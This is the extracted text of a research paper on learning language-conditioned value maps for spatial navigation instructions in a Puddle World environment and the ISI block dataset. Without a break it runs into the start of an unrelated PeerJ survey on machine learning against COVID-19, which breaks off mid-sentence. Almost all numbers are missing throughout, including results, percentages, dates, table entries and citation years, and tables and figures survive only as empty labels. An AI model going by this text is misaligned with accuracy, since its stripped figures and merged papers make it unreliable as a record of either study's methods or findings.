&yearselect=yearrange&sort=yr representation learning for grounded spatial reasoning michael janner, karthik narasimhan, and regina barzilay computer science and artificial intelligence laboratory massachusetts institute of technology {janner, karthikn, regina}@csail.mit.edu abstract the interpretation of spatial references is highly contextual, requiring joint inference over both language and the environment. we consider the task of spatial reasoning in a sim- ulated environment, where an agent can act and receive rewards. the proposed model learns a representation of the world steered by instruction text. this design allows for pre- cise alignment of local neighborhoods with corresponding verbalizations, while also han- dling global references in the instructions. we train our model with reinforcement learning using a variant of generalized value itera- tion. the model outperforms state-of-the-art approaches on several metrics, yielding a % reduction in goal localization error. introduction understanding spatial references in natural language is essential for successful human-robot communica- tion and autonomous navigation. this problem is challenging because interpretation of spatial refer- ences is highly context-dependent. for instance, the instruction “reach the cell above the westernmost rock” translates into different goal locations in the two environments shown in figure . therefore, to enable generalization to new, unseen worlds, the model must jointly reason over the instruction text and environment configuration. moreover, the rich- ness and flexibility in verbalizing spatial references further complicates interpretation of such instruc- tions. code and dataset are available at https://github. com/jannerm/spatial-reasoning reach the cell above the westernmost rock figure : sample d worlds and an instruction de- scribing a goal location. the optimal path from a common start position, denoted by a white dashed line, varies considerably with changes in the map layout. in this paper, we explore the problem of spa- tial reasoning in the context of interactive worlds. specifically, we assume access to a simulated envi- ronment, in which an agent can take actions to inter- act with the world and is rewarded for reaching the location specified by the language instruction. this feedback is the only source of supervision the model uses for interpreting spatial references. the key modeling task here is to induce a repre- sentation that closely ties environment observations and linguistic expressions. in prior work, this issue was addressed by learning representations for each modality and then combining them, for instance, with concatenation (misra et al., ). while this approach captures high-level correspondences be- tween instructions and maps, it does not encode de- transactions of the association for computational linguistics, vol. , pp. – , . action editor: hal daumé iii. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. tailed, lower-level mappings between specific posi- tions on the map and their descriptions. as our ex- periments demonstrate, combining the language and environment representations in a spatially localized manner yields significant performance gains on the task. to this end, our model uses the instruction text to drive the learning of the environment representation. we start by converting the instruction text into a real- valued vector using a recurrent neural network with lstm cells (hochreiter and schmidhuber, ). using this vector as a kernel in a convolution opera- tion, we obtain an instruction-conditioned represen- tation of the state. this allows the model to reason about immediate local neighborhoods in references such as “two cells to the left of the triangle”. we further augment this design to handle global refer- ences that involve information concerning the entire map (e.g. “the westernmost rock”). this is achieved by predicting a global value map using an additional component of the instruction representation. the en- tire model is trained with reinforcement learning us- ing the environmental reward signal as feedback. we conducted our experiments using a d virtual world as shown in figure . overall, we created over , tasks across maps, with instructions sourced from mechanical turk. we compare our model against two state-of-the-art systems adapted for our task (misra et al., ; schaul et al., ). the key findings of our experiments are threefold. first, our model can more precisely interpret instruc- tions than baseline models and find the goal location, yielding a % reduction in manhattan distance er- ror over the closest competitor. second, the model can robustly generalize across new, unseen map lay- outs. finally, we demonstrate that factorizing the instruction representation enables the model to sus- tain high performance when handling both local and global references. related work spatial reasoning in text this topic has attracted both theoretical and practical interest. from the lin- guistic and cognitive perspectives, research has fo- cused on the wide range of mechanisms that speak- ers use to express spatial relations (tenbrink, ; viethen and dale, ; byrne and johnson-laird, ; li and gleitman, ). the practical impli- cations of this research are related to autonomous navigation (moratz and tenbrink, ; levit and roy, ; tellex et al., ) and human-robot in- teraction (skubic et al., ). previous computational approaches include tech- niques such as proximity fields (kelleher et al., ), spatial templates (levit and roy, ) and geometrically defined mappings (moratz and ten- brink, ; kollar et al., ). more recent work in robotics has integrated text containing position in- formation with spatial models of the environment to obtain accurate maps for navigation (walter et al., ; hemachandra et al., ). most of these ap- proaches typically assume access to detailed geome- try or other forms of domain knowledge. in contrast to these knowledge-rich approaches, we are learn- ing spatial reference via interaction with the envi- ronment, acquiring knowledge of the environment in the process. instruction following spatial reasoning is a com- mon element in many papers on instruction follow- ing (macmahon et al., ; vogel and jurafsky, ; chen and mooney, ; artzi and zettle- moyer, ; kim and mooney, ; andreas and klein, ). as a source of supervision, these methods assume access to demonstrations, which specify the path corresponding with provided in- structions. in our setup, the agent is only driven by the final rewards when the goal is achieved. this weaker source of supervision motivates devel- opment of new techniques not considered in prior work. more recently, misra et al. ( ) proposed a neural architecture for jointly mapping instructions and visual observations (pixels) to actions in the environment. their model separately induces text and environment representations, which are concate- nated into a single vector that is used to output an action policy. while this representation captures coarse correspondences between the modalities, it doesn’t encode mappings at the level of local neigh- borhoods, negatively impacting performance on our task. universal value functions the idea of general- ized value functions has been explored before in schaul et al. ( ). the technique, termed uvfa, presents a clever trick of factorizing the value func- tion over states and goals using singular value de- composition (svd) and then learning a regression model to predict the low-rank vectors. this results in quick and effective generalization to all goals in the same state space. however, their work stops short of exploring generalization over map layouts, which our model is designed to handle. furthermore, our setup also involves specifying goals using natural language instructions, which is different from the coordinate-style specification used in that work. general framework task setup we model our task as a markov deci- sion process (mdp), where an autonomous agent is placed in an interactive environment with the capa- bility to choose actions that can affect the world. a goal is described in text, and rewards are available to the agent correspondingly. the mdp can be rep- resented by the tuple 〈s,a,x,t,r〉, where s is the set of all possible state configurations, a is the set of actions available to the agent, x is the set of all goal specifications in natural language, t(s′|s,a,x) is the transition distribution, and r(s,x) is the reward function. a state s ∈ s includes information such as the locations of different entities along with the agent’s own position. in this work, t is determin- istic in the environments considered; however, our methods also apply in the stochastic case. text instructions prior work has investigated hu- man usage of different types of referring expres- sions to describe spatial relations (levinson, ; viethen and dale, ). in order to build a ro- bust instruction following system, we examine sev- eral categories of spatial expressions that exhibit the wide range of natural language goal descriptions. specifically, we consider instructions that utilize ob- jects/entities present in the environment to describe a goal location. these instructions can be catego- rized into three groups: (a) text referring to a specific entity (e.g., “go to the circle”). (b) text specifying a location using a single refer- we will use the terms goal specifications and instructions interchangeably. ent entity (e.g., “reach the cell above the west- ernmost rock”). (c) text specifying a location using multiple refer- ent entities (e.g., “move to the goal two squares to the left of the heart and top right of house”). these three categories exemplify an increasing level of complexity, with the last one having multiple lev- els of indirection. in each category, we have both local and global references to objects. local references require an understanding of spatial prepositional phrases such as ‘above’, ‘in between’ and ‘next to’ in order to de- termine the precise goal location. this comprehen- sion is invariant to the global position of the object landmark(s) provided in the instruction. a global reference, on the other hand, contains superlatives such as ‘easternmost’ and ‘topmost’, which require reasoning over the entire map. for example, in the case of (a) above, a local reference would describe a unique object (e.g., “go to the circle”), whereas a global reference might require comparing the po- sitions of all objects of a specific type (e.g., “go to the northernmost tree”). a point to note is that we do not assume any ac- cess to mapping from instructions to objects or enti- ties in the worlds or a knowledge of spatial ontology – the system has to learn this entirely through feed- back from the environment. generalized value iteration learning to reach the goal while maximizing cumulative reward can be done by using a value function v (s) (sutton and barto, ) which represents the agent’s notion of expected future reward from state s. a popular al- gorithm to learn an optimal value function is value iteration (vi) (bellman, ), which uses the tech- nique of dynamic programming. in the standard bellman equation, the value func- tion is dependent solely on state. schaul et al. ( ) proposed a value function v (s,g) describing the ex- pected reward from being in state s given goal g, capturing that state values are goal-dependent and that a single environment can offer many such goals. we also make use of such a generalized value func- tion, although our goals are not observed directly as a local reference for a non-unique object would be am- biguous, of course. figure : a schematic depiction of our model. text instructions are represented as a vector h(t) and states as embeddings φ(s). a portion of the text representation is used as a convolutional kernel on φ(s), giving a text-conditioned local state representation z . the remaining components are used as coefficients in a linear combination of gradient functions to give a global map-level representation z . z and z are concatenated and input to a convolutional neural network to predict the final value map. coordinate locations or states themselves but rather described in natural language. with x denoting a textual description of a goal, our vi update equa- tions are: q(s,a,x) = r(s,x) + γ ∑ s′∈s t(s′|s,a,x)v (s′,x) ( )v (s,x) = max a q(s,a,x) where q is the action-value function, tracking the value of choosing action a in state s. once an opti- mal value function is learned, a straightforward ac- tion policy is: ( )π(s,x) = arg max a q(s,a,x) model generalization over both environment configura- tions and text instructions requires a model that meets two desiderata. first, it must have a flexible representation of goals, one which can encode both the local structure and global spatial attributes inher- ent to natural language instructions. second, it must be compositional; the representation of language should be generalizable even though each unique in- struction will only be observed with a single map during training. namely, the learned representation for a given instruction should still be useful even if the objects on a map are rearranged or the layout is changed entirely. to that end, our model combines the textual in- structions with the map in a spatially localized man- ner, as opposed to prior work which joins goal repre- sentations and environment observations via simpler functions like an inner product (schaul et al., ). while our approach can more effectively learn local relations specified by language, it cannot naturally capture descriptions at the global environment level. to address this problem, we also use the language representation to predict coefficients for a basis set of gradient functions which can be combined to en- code global spatial relations. more formally, inputs to our model (see figure ) consist of an environment observation s and textual description of a goal x. for simplicity, we will as- sume s to be a d matrix, although the model can easily be extended to other input representations. we first convert s to a d tensor by projecting each cell to a low-dimensional embedding (φ) as a func- tion of the objects contained in that cell. in parallel, the text instruction x is passed through an lstm recurrent neural network (hochreiter and schmid- huber, ) to obtain a continuous vector represen- tation h(x). this vector is then split into local and global components h(x) = [h (x); h (x)]. the lo- cal component, h (x), is reshaped into a kernel to perform a convolution operation on the state embed- ding φ(s) (similar to chen et al. ( )): ( )z = ψ (φ(s); h (x)) meanwhile, the three-element global component algorithm training procedure : initialize experience memory d : initialize model parameters Θ : for epoch= ,m do : sample instruction x∈x and associated environ- ment e : predict value map v̂ (s,x;Θ) for all s∈e : choose start state s randomly : for t= ,n do : select at=argmax a ∑ s t(s|st− ,a)v̂ (s,x;Θ) : observe next state st and reward rt : store trajectory (s=s ,s ,...,r=r ,r ,...) in d : for j= ,j do : sample random trajectory (s,r) from d : perform gradient descent step on loss l(θ) h (x) is used to form the coefficients for a vertical and horizontal gradient along with a corresponding bias term. the gradients, denoted g and g in figure , are matrices of the same dimensionality as the state observation with values increasing down the rows and along the columns, respectively. the axis-aligned gradients are weighted by the elements of h (x) and summed to give a final global gradi- ent spanning the entire d space, analogous to how steerable filters can be constructed for any orienta- tion using a small set of basis filters (freeman and adelson, ): ( )z = h (x)[ ]·g +h (x)[ ]·g +h (x)[ ]·j in which j is the all-ones matrix also of the same dimensionality as the observed map. finally, the local and global information maps are concatenated into a single tensor, which is then pro- cessed by a convolutional neural network (cnn) with parameters θ to approximate the generalized value function: ( )v̂ (s,x) = ψ ([z ; z ]; θ) for every state s in the map. reinforcement learning given our model’s v̂ (s,x) predictions, the resulting policy (equa- tion ) can be enacted, giving a continuous trajectory of states {st,st+ , . . .} on a single map and their associated rewards {rt,rt+ , . . .} at each timestep note that we are referring to gradient filters here, not the gradient calculated during backpropagation in deep learning. t. we stored entire trajectories (as opposed to state transition pairs) in a replay memory d as described in mnih et al. ( ). the model is trained to pro- duce an accurate value estimate by minimizing the following objective: ( ) l(Θ) = es∼d [ v̂ (s,x; Θ) − ( r(s,x) + γ max a ∑ s′ t(s′|s,a)v̂ (s′,x; Θ−) )] where s is a state sampled from d, γ is the discount factor, Θ is the set of parameters of the entire model, and Θ− is the set of parameters of a target network copied periodically from our model. the complete training procedure is shown in algorithm . experimental setup puddle world navigation data in order to study generalization across a wide variety of environmen- tal conditions and linguistic inputs, we develop an extension of the puddle world reinforcement learn- ing benchmark (sutton, ; mankowitz et al., ). states in a × grid are first filled with ei- ther grass or water cells, such that the grass forms one connected component. we then populate the grass region with six unique objects which appear only once per map (triangle, star, diamond, circle, heart, and spade) and four non-unique objects (rock, tree, horse, and house) which can appear any num- ber of times on a given map. see figure for an example visualization. split local global train test table : overall statistics of our dataset. goal positions are chosen uniformly at random from the set of grass cells, encouraging the use of spatial references to describe goal locations which do not themselves contain a unique object. we used the mechanical turk crowdsourcing plat- form (buhrmester et al., ) to collect natural lan- guage descriptions of these goals. human annota- tors were asked to describe the positions of these • reach the horse below the rock and to the left of the green diamond • move to the square two below and one left of the star • go to the cell above the bottommost horse figure : example goal annotations collected with mechanical turk. goals using surrounding objects. at the end of each trial, we asked the same participants to provide goal locations given their own text instructions. this helped filter out a majority of instructions that were ambiguous or ill-specified. table provides some statistics on the data, and figure shows example annotations. in total, we collected instructions, ranging from to words in length, describing over maps. there are unique words in the annotated instructions. we do not perform any pre- processing on the raw annotations. it is plausible that a model designed to handle only local references could not handle global ones (consider our own model without the global gradi- ent maps). for clearer interpretation of results, we evaluate our model in two modes: trained and tested on local and global data separately, or as a combined dataset. while local instructions were obtained eas- ily, the global instructions were collected by design- ing a task in which only nonunique objects were pre- sented to the annotators. this precluded simple in- structions like “go left of the 〈object〉” because there would always be more than one of each object type. therefore, we obtained text with global properties (e.g. middle rock, leftmost tree) to sufficiently pin- point an object. on average, we collected unique local instructions and unique global instructions per map. to quantify the diversity of our dataset, we find the five nearest instructions in the training set for every instruction in the test set, as measured by edit distance (using the word as a unit) normalized by test instruction length. for each of these pairs, we also measure the manhattan distance between their corresponding goal locations. figure , which visu- the other objects were added back into the map after col- lecting the instruction. figure : a heatmap showing the normalized in- struction edit distance and goal manhattan distance corresponding to the most similar instructions be- tween the train and test set. for each instruction in the test set, we find the five most similar instructions in the training set. even for those instructions which are similar, the goal locations they describe can be far apart. alizes this analysis, underscores the difficulty of this task; even when two instructions are highly similar, they might correspond to entirely different target lo- cations. this is the case in the example in figure , which has a distance of four between the references goals. baselines we compare our model to the following baselines: uvfa (text) is a variant of the model described in (schaul et al., ) adapted for our task. the original model made use of two mlps to learn low dimensional embeddings of states and goals which were then combined via dot product to give value estimates. goals were represented either as (x,y) coordinates or as states themselves. as our goals are not observed directly but described in text, we replace the goal mlp with the same lstm as in our model. the state mlp has an identical architecture to that of the uvfa: two hidden layers of dimension and relu activations. for consistency with the uvfa, we represent states as binary vectors denot- ing the presence of each type of object at every po- sition. cnn + lstm is a variant of the model described in misra et al. ( ), who developed it for a language-grounded block manipulation task. it first convolves the map layout to a low-dimensional rep- figure : reward achieved by our model and the two baselines on the training environments during re- inforcement learning on both local and global instructions. each epoch corresponds to simulation on goals, with a goal simulation terminating either when the agent reaches the goal state or has taken actions. resentation (as opposed to the mlp of the uvfa) and concatenates this to the lstm’s instruction em- bedding (as opposed to a dot product). these con- catenated representations are then input to a two- layer mlp. we also perform analysis to study the represen- tational power of our model, introducing two more comparison models: uvfa (pos) is the original uvfa model from (schaul et al., ), which we evaluate on our mod- ified puddle worlds to determine the difficulty of environment generalization independently from in- struction interpretation. our model (w/o gradient) is an ablation of our model without the global gradient maps, which allows us to determine the gradients’ role in representation-building. in additional to our reinforcement learning ex- periments, we train these models in a supervised setting to isolate the effects of architecture choices from other concerns inherent to reinforcement learn- ing algorithms. for this purpose, we constructed a dataset of ground-truth value maps for all human- annotated goals using value iteration. we use the models to predict value maps for the entire grid and minimize the mean squared error (mse) compared to the ground truth values: ( )l′(Θ) = ∑ (s,x) [v̂ (s,x; Θ) − v̄ (s,x)] . implementation details our model implementation uses an lstm with a learnable -dimensional embedding layer, hid- den units, -dimensional embeddings φ(s), and a x kernel applied to the embeddings, giving a di- mension of for h (t). the final cnn has layers of { , , , , , } channels, all with x kernels and padding of length such that the output value map prediction is equal in size to the input observa- tion. for each map, a reward of is given for reach- ing the correct goal specified by human annotation and a reward of − is given for falling in a puddle cell. the only terminal state is when the agent is at the goal. rewards are discounted by a factor of . . we use adam optimization (kingma and ba, ) for training all models. results we present empirical results on two different datasets - our annotated puddle world and an exist- ing block navigation task (bisk et al., ). . puddle world navigation comparison with the state-of-the-art we first investigate the ability of our model to learn solely from environment simulation. figure shows the discounted reward achieved by our model as well as the two baselines for both instruction types. in both experiments, our model is the only one of the local global combined policy quality distance policy quality distance policy quality distance uvfa (text) . . . . . . cnn + lstm . . . . . . our model . . . . . . table : performance of models trained via reinforcement learning on a held-out set of environments and instructions. policy quality is the true expected normalized reward and distance denotes the manhattan distance from goal location prediction to true goal position. we show results from training on the local and global instructions both separately and jointly. local global mse policy quality distance mse policy quality distance uvfa (pos) . . . . . . uvfa (text) . . . . . . cnn + lstm . . . . . . our model (w/o gradient) . . . . . . our model . . . . . . table : performance on a test set of environments and instructions after supervised training. lower is better for mse and manhattan distance; higher is better for policy quality. the gradient basis significantly improves the reconstruction error and goal localization of our model on global instructions, and expectedly does not affect its performance on local instructions. three to achieve an average nonnegative reward after convergence ( . for local instructions and . for global instructions), signifying that the baselines do not fully learn how to navigate through these envi- ronments. following schaul et al. ( ), we also evaluated our model using the metric of policy quality. this is defined as the expected discounted reward achieved by following a softmax policy of the value predic- tions. policy quality is normalized such that an op- timal policy has a score of and a uniform random policy has a score of . intuitively, policy quality is the true normalized expectation of score over all maps in the dataset, instructions per map, and start states per map-instruction pair. our model outper- forms both baselines on this metric as well on the test maps (table ). we also note that the perfor- mance of the baselines flip with respect to each other as compared to their performance on the training maps (figure ). while the uvfa variant learned a better policy on the train set, it did not generalize to new environments as well as the cnn + lstm. finally, given the nature of our environments, we can use the predicted value maps to infer a goal lo- cation by taking the position of the maximum value. we use the manhattan distance from this predicted position to the actual goal location as a third met- ric. the accuracy of our model’s goal predictions is more than twice that of the baselines on local refer- ences and roughly % better on global references. analysis of learned representations for the rep- resentation analysis in a supervised setting, we com- pared the predicted value maps of all models against figure : value map predictions for two environments paired with two instructions each. despite the dif- ference in instructions, with one being global and the other local in nature and sharing no objects in their descriptions, they refer to the same goal location in the environment in (a). however, in (b), the descriptions correspond to different locations on the map. the vertical axis considers variance in goal location for the same instruction, depending on the map configuration. the unseen test split of maps. table shows the re- sults of this study. as expected, our model with- out the global gradient performs no differently from the full model on local references, but has higher mse and average distances to true goal than the full model on global references. we also note that uvfa (pos) performs much worse than both cnn+lstm and our model, showing the difficulty of environ- ment generalization even when the goals are ob- served directly. (the original uvfa paper (schaul et al., ) demonstrated effective generalization over goal states within a single environment.) surprisingly, our model trained via reinforcement learning has more precise goal location predictions (as measured via manhattan distance) than when trained on true state values in a supervised manner. however, the mse of the value predictions are much higher in the rl setting (e.g., . vs . for super- vised on local instructions). this shows that despite the comparative stability of the supervised setting, minimization of value prediction error does not nec- essarily lend itself to the best policy or goal local- ization. conversely, having a higher mse does not always imply a worse policy, as seen also in the per- formance of the two uvfa variants in table . generalization one of the criteria laid out for our model was its ability to construct language repre- sentations and produce accurate value maps, inde- pendent of layouts and linguistic variation. figure provides examples of two layouts, each with two dif- ferent instructions. in the first map (top), we have both instructions referring to the same location. our model is able to mimic the optimal value map accu- rately, while the other baselines are not as precise, either producing a large field of possible goal loca- tions (cnn+lstm) or completely missing the goal (uvfa-text). on the vertical axis, we observe generalization across different maps with the same instructions. our model is able to precisely identify the goals in each scenario in spite of significant variation in their figure : examples of failure cases for our model. multiple levels of indirection in (a) and a long in- struction filled with redundant information in (b) make the instruction difficult to interpret. intended goal locations are outlined in red for clarity. locations. this proves harder for the other represen- tations. although our model is compositional in the sense that it transfers knowledge of spatial references be- tween different environments, some types of instruc- tions do prove challenging. we identify two of the poorest predictions in figure . we see that multiple levels of indirection (as in a, which references a lo- cation relative to an object relative to another object) or unnecessarily long instructions (as in b, which uniquely identifies a position by the eighth token but then proceeds with redundant information) are still a challenge. learning curve due to the manual effort that comes with constructing a dataset of human anno- tations, it is also important to consider the sample- efficiency of a model. figure shows the quality policy and prediction error on local instructions as a function of training set size. our model reaches . policy quality with only samples, demonstrating efficient generalization capability. figure : effect of training set size on held-out pre- dictions. the curves show the mean of ten training runs and the shaded regions show standard devia- tion. our model’s policy quality is greater than . with as few as training goal annotations. language grounding dataset policy quality distance uvfa (text) . . cnn + lstm . . our model . . table : the performance of our model and two baselines on the isi language grounding dataset (bisk et al., ). our model once again out- performs the baselines, although all models have a lower policy quality on this dataset than on our own. . isi grounding dataset we also evaluate our model on the isi language grounding dataset (bisk et al., ), which con- tains human-annotated instructions describing how to arrange blocks identified by numbers and logos. although it does not contain variable environment maps as in our dataset, it has a larger action space and vocabulary. the caveat is that the task as posed in the original dataset is not compatible with our model. for a policy to be derived from a value map with the same dimension as the state observation, it is implicitly assumed that there is a single con- trollable agent, whereas the isi set allows multiple blocks to be moved. we therefore modify the isi setup using an oracle to determine which block is given agency during each step. this allows us to figure : (a-c) visualizations of tasks from the isi language grounding dataset (bisk et al., ) and our model’s value map predictions. the agentive block and goal location are outlined in red for visibility. (d) the mse of the value map prediction as a function of a subgoal’s ordering in an overall task. the model performs better on subgoals later in a task despite the subgoals being treated completely independently during both training and testing. retain the linguistic variability of the dataset while overcoming the mismatch in task setup. the states are discretized to a × map and the instructions are lemmatized. performance on the modified isi dataset is re- ported in table and representative visualizations are shown in figure . our model outperforms both baselines by a greater margin in policy quality than on our own dataset. misra et al. ( ) also use this dataset and report results in part by determining the minimum distance between an agent and a goal during an evaluation lasting n steps. this evaluation metric is therefore dependent on this timeout parameter n. because we discretized the state space so as to be able to repre- sent it as a grid of embeddings, the notion of a single step has been changed and direct comparison limited to n steps is ill-defined. hence, due to modifica- when a model is available and the states are not over- whelmingly high-dimensional, policy quality is a useful metric that is independent of this type of parameter. as such, it is our tions in the task setup, we cannot compare directly to the results in misra et al. ( ). understanding grounding evaluation an inter- esting finding in our analysis was that the difficulty of the language interpretation task is a function of the stage in task execution (figure (d)). in the isi language grounding set (bisk et al., ), each individual instruction (describing where to move a particular block) is a subgoal in a larger task (such as constructing a circle with all of the blocks). the value maps predicted for subgoals occurring later in a task are more accurate than those occurring early in the task. it is likely that the language plays a less crucial role in specifying the subgoal position in the final steps of a task. as shown in figure (a), it may be possible to narrow down candidate subgoal po- sitions just by looking at a nearly-constructed high- default metric here. however, estimating policy quality for en- vironments substantially larger than those investigated here is a challenge in itself. level shape. in contrast, this would not be possible early in a task because most of the blocks will be randomly positioned. this finding is consistent with a result from branavan et al. ( ), who reported that strategy game manuals were useful early in the game but became less essential further into play. it appears to be part of a larger trend that the marginal benefit of language in such grounding tasks can vary predictably between individual instructions. conclusions we have described a novel approach for grounded spatial reasoning. combining the language repre- sentation in a spatially localized manner allows for increased precision of goal identification a nd im- proved performance on unseen environment config- urations. alongside our models, we present pud- dle world navigation, a new grounding dataset for testing the generalization capacity of instruction- following algorithms in varied environments. acknowledgement we thank the members of the mit nlp group, the tacl reviewers and action editor for helpful feedback. we gratefully acknowledge support from the mit lincoln laboratory and the mit super- urop program. references jacob andreas and dan klein. . alignment-based compositional semantics for instruction following. in emnlp. yoav artzi and luke zettlemoyer. . weakly su- pervised learning of semantic parsers for mapping in- structions to actions. tacl, ( ): – . richard bellman. . dynamic programming. princeton university press, princeton, nj, usa, edi- tion. yonatan bisk, deniz yuret, and daniel marcu. . natural language communication with robots. in naacl hlt, pages – . s.r.k. branavan, david silver, and regina barzilay. . learning to win by reading manuals in a monte- carlo framework. in acl hlt, pages – . michael buhrmester, tracy kwang, and samuel d. gosling. . amazon’s mechanical turk. per- spectives on psychological science, ( ): – . pmid: . ruth m.j. byrne and philip n. johnson-laird. . spatial reasoning. journal of memory and language, ( ): – . david l. chen and raymond j. mooney. . learn- ing to interpret natural language navigation instruc- tions fro mobservations. in proceedings of the th aaai conference on artificial intelligence (aaai- ), pages – , san francisco, ca, usa, au- gust. kan chen, jiang wang, liang-chieh chen, haoyuan gao, wei xu, and ram nevatia. . abc- cnn: an attention based convolutional neural net- work for visual question answering. arxiv preprint arxiv: . . william t. freeman and edward h. adelson. . the design and use of steerable filters. ieee tpami, ( ): – . sachithra hemachandra, matthew r. walter, stefanie tellex, and seth teller. . learning spatial- semantic representations from natural language de- scriptions and scene classifications. in icra, pages – . ieee. sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . john d. kelleher, geert-jan m. kruijff, and fintan j. costello. . proximity in context: an empirically grounded computational model of proximity for pro- cessing topological spatial expressions. in acl, pages – . joohyun kim and raymond j. mooney. . adapting discriminative reranking to grounded language learn- ing. in acl ( ), pages – . diederik p. kingma and jimmy ba. . adam: a method for stochastic optimization. in iclr. thomas kollar, stefanie tellex, deb roy, and nicholas roy. . toward understanding natural language directions. in human-robot interaction, pages – . ieee. stephen c levinson. . space in language and cog- nition: explorations in cognitive diversity, volume . cambridge university press. michael levit and deb roy. . interpretation of spa- tial language in a map navigation task. ieee transac- tions on systems, man, and cybernetics, part b (cy- bernetics), ( ): – . peggy li and lila gleitman. . turning the ta- bles: language and spatial reasoning. cognition, ( ): – . matt macmahon, brian stankiewicz, and benjamin kuipers. . walk the talk: connecting language, knowledge, and action in route instructions. aaai, ( ): . daniel j. mankowitz, timothy arthur mann, and shie mannor. . iterative hierarchical optimiza- tion for misspecified problems (ihomp). corr, abs/ . . dipendra k. misra, john langford, and yoav artzi. . mapping instructions and visual observations to actions with reinforcement learning. emnlp. volodymyr mnih, koray kavukcuoglu, david silver, andrei a. rusu, joel veness, marc g. bellemare, alex graves, martin riedmiller, andreas k. fidje- land, georg ostrovski, stig petersen, charles beat- tie, amir sadik, ioannis antonoglou, helen king, dharshan kumaran, daan wierstra, shane legg, and demis hassabis. . human-level control through deep reinforcement learning. nature, ( ): – , . reinhard moratz and thora tenbrink. . spatial ref- erence in linguistic human-robot interaction: iterative, empirically supported development of a model of pro- jective relations. spatial cognition and computation, ( ): – . tom schaul, daniel horgan, karol gregor, and david silver. . universal value function approximators. in icml, pages – . m. skubic, d. perzanowski, s. blisard, a. schultz, w. adams, m. bugajska, and d. brock. . spatial language for human-robot dialogs. ieee transactions on systems, man, and cybernetics, part c (applica- tions and reviews), ( ): – , may. richard s. sutton and andrew g. barto. . introduc- tion to reinforcement learning. mit press. richard s. sutton. . generalization in rein- forcement learning: successful examples using sparse coarse coding. in nips. stefanie tellex, thomas kollar, steven dickerson, matthew r. walter, ashis gopal banerjee, seth j. teller, and nicholas roy. . understanding natu- ral language commands for robotic navigation and mo- bile manipulation. in aaai. thora tenbrink. . space, time, and the use of lan- guage: an investigation of relationships, volume . walter de gruyter. jette viethen and robert dale. . the use of spatial relations in referring expression generation. in pro- ceedings of the fifth international natural language generation conference, pages – . acl. adam vogel and dan jurafsky. . learning to follow navigational directions. in acl, pages – . matthew r. walter, sachithra hemachandra, bianca homberg, stefanie tellex, and seth teller. . learning semantic maps from natural language de- scriptions. proceedings of the robotics: science and systems ix conference. early survey with bibliometric analysis on machine learning approaches in controlling covid- outbreaks early survey with bibliometric analysis on machine learning approaches in controlling covid- outbreaks haruna chiroma , absalom e. ezugwu , fatsuma jauro , mohammed a. al-garadi , idris n. abdullahi and liyana shuib future technology research center, national yunlin university of science and technology, yulin, taiwan school of mathematics, statistics, and computer science, university of kwazulu-natal, kwazulu-natal, south africa department of computer science, faculty of science, ahmadu bello university, zaria, nigeria department of biomedical informatics, emory university, atlanta, ga, usa department of medical laboratory science, college of medical sciences, ahmadu bello university, zaria, nigeria department of information system, universiti malaya, kuala lumpur, malaysia abstract background and objective: the covid- pandemic has caused severe mortality across the globe, with the usa as the current epicenter of the covid- epidemic even though the initial outbreak was in wuhan, china. many studies successfully applied machine learning to fight covid- pandemic from a different perspective. to the best of the authors’ knowledge, no comprehensive survey with bibliometric analysis has been conducted yet on the adoption of machine learning to fight covid- . therefore, the main goal of this study is to bridge this gap by carrying out an in-depth survey with bibliometric analysis on the adoption of machine learning-based technologies to fight covid- pandemic from a different perspective, including an extensive systematic literature review and bibliometric analysis. methods: we applied a literature survey methodology to retrieved data from academic databases and subsequently employed a bibliometric technique to analyze the accessed records. besides, the concise summary, sources of covid- datasets, taxonomy, synthesis and analysis are presented in this study. it was found that the convolutional neural network (cnn) is mainly utilized in developing covid- diagnosis and prognosis tools, mostly from chest x-ray and chest ct scan images. similarly, in this study, we performed a bibliometric analysis of machine learning-based covid- related publications in the scopus and web of science citation indexes. finally, we propose a new perspective for solving the challenges identified as direction for future research. we believe the survey with bibliometric analysis can help researchers easily detect areas that require further development and identify potential collaborators. results: the findings of the analysis presented in this article reveal that machine learning-based covid- diagnose tools received the most considerable attention from researchers. specifically, the analyses of results show that energy and resources are more dispenses towards covid- automated diagnose tools while covid- drugs and vaccine development remains grossly underexploited. besides, the machine learning-based algorithm that is predominantly utilized by researchers in developing the diagnostic tool is cnn mainly from x-rays and ct scan images. how to cite this article chiroma h, ezugwu ae, jauro f, al-garadi ma, abdullahi in, shuib l. . early survey with bibliometric analysis on machine learning approaches in controlling covid- outbreaks. peerj comput. sci. :e doi . /peerj-cs. submitted july accepted october published november corresponding author absalom e. ezugwu, ezugwua@ukzn.ac.za academic editor ahmed elazab additional information and declarations can be found on page doi . /peerj-cs. copyright chiroma et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:ezugwua@�ukzn.�ac.�za https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ conclusions: the challenges hindering practical work on the application of machine learning-based technologies to fight covid- and new perspective to solve the identified problems are presented in this article. furthermore, we believed that the presented survey with bibliometric analysis could make it easier for researchers to identify areas that need further development and possibly identify potential collaborators at author, country and institutional level, with the overall aim of furthering research in the focused area of machine learning application to disease control. subjects bioinformatics, artificial intelligence, data mining and machine learning keywords bibliometric analysis, convolutional neural network, covid- pandemic, covid- diagnosis tool, machine learning introduction the novel coronavirus disease pandemic emerged on december , , and the chinese government announced the isolation of new types of coronavirus on january , (imai et al., ). this virus was code-named as covid- by the world health organization (who) on january , . however, it was renamed to severe acute respiratory syndrome coronavirus- (sars-cov- ) by the international committee on the taxonomy of the virus (gorbalenya, ). since the pandemic, the number of confirmed cases as of october , reached , , with , , recorded fatalities. according to the origin of the first confirmed case report, the infection’s transmission was from animal to human, that is, zoonotic agent (read et al., ). the virus has extended beyond china to other continents of the world (wang et al., a). the rise in the number of cases in wuhan and other countries after the evacuation of the cases and closure of the marketplace in wuhan shows a secondary transmission between humans. related to the severe acute respiratory syndrome (sars), the covid- pandemic occurred during the china spring festival, the most famous celebration in china that attracted about million chinese people who traveled throughout the country. this festival period might have created an avenue for the transmission of this contiguous disease, making its prevention and control very difficult. the report on the secondary cases was made approximately days after the first outbreak of the virus. these new patients were infected through human-to-human transmission because they never had any contact with the wuhan marketplace, the origin of the first case of the pandemic (read et al., ). the first non-chinese infected case that spread over the provinces of china and then to the 